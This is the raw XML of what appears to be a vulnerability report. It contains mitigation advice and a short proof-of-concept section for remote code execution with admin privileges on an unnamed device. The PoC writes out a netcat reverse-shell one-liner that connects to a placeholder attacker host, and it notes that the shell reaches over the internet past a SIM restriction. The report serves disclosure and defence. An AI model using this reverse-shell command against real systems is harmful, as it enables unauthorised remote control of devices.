        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00027BD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Strengthen input validation mechanisms to thoroughly sanitize user-provided commands, blocking any attempts at injection of malicious payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AFEFB7" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="00027BD3" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00027BD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Implement strict filtering rules to detect and neutralize known patterns indicative of reverse shell commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8C011E" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="00027BD3" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00027BD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Network Segmentation and Access Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F13BA3B" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="00027BD3" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00027BD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Employ network segmentation strategies to isolate critical devices and limit the scope of potential attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DC5D93" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="00027BD3" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00027BD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Implement robust access control policies to restrict remote access to authorized users only, reducing the attack surface for reverse shell exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFE98B6" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="00BF53A7" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04353C76" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="00BF53A7" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="095D3324" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="577FAF5D" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="587760F8" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76CFF04B" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22426429" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6809368F" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447EF898" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="00BF53A7" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5613C798" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="00154ABA" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FDCED08" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="00E12EE8" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E12EE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Code execution with admin privilege -POC </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697E2B70" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="001573D7" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2855583B" w14:textId="77777777" w:rsidR="00807043" w:rsidRPr="001573D7" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Converting command injection to RCE via following command   </w:t>
      </w:r>
      <w:r w:rsidRPr="001573D7">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>rm -f /tmp/p; mk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fifo</w:t>
      </w:r>
      <w:r w:rsidRPr="001573D7">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp/p p &amp;&amp; nc attackerip 4444 0/tmp/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and getting reverse connection over local network </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D26A287" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001573D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BC306A4" wp14:editId="43E299EB">
            <wp:extent cx="5943600" cy="2919046"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="473021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1529" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5950274" cy="2922324"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E35FFBD" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001573D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Taking same connection over internet bypassing sim </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>restriction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A0E8AC" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6737AC21" wp14:editId="5DD34D12">
            <wp:extent cx="5943600" cy="3044825"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="10461528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52857"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500B07CB" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5236D395" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C5FD6FE" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C79C47" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043" w:rsidP="00807043">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B684098" w14:textId="77777777" w:rsidR="00807043" w:rsidRDefault="00807043"/>
    <w:sectPr w:rsidR="00807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90288"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53BE2F4C"/>
    <w:lvl w:ilvl="0" w:tplc="D194D8DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="72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25487B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A976B6DC"/>
    <w:lvl w:ilvl="0" w:tplc="62ACF9DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Aria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AC32E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA8A1E1E"/>
    <w:lvl w:ilvl="0" w:tplc="62ACF9DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Aria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1271230">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1136026841">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="939030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043"/>
    <w:rsid w:val="00160C8B"/>
    <w:rsid w:val="0080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5BF3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6BAD7C68-7D5C-4E92-9D70-4DCA94FDB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043"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:lang w:val="en-AE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008070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70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70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70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70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70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0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0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0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0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70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70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70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70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70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0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0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043"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="0080704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0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0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0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043"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00807043"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00807043"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00807043"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00807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7043"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00807043"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00160C8B"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>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297</Words>
  <Characters>1699</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>14</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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nmap</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mr nmap</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-07T12:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-07T12:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>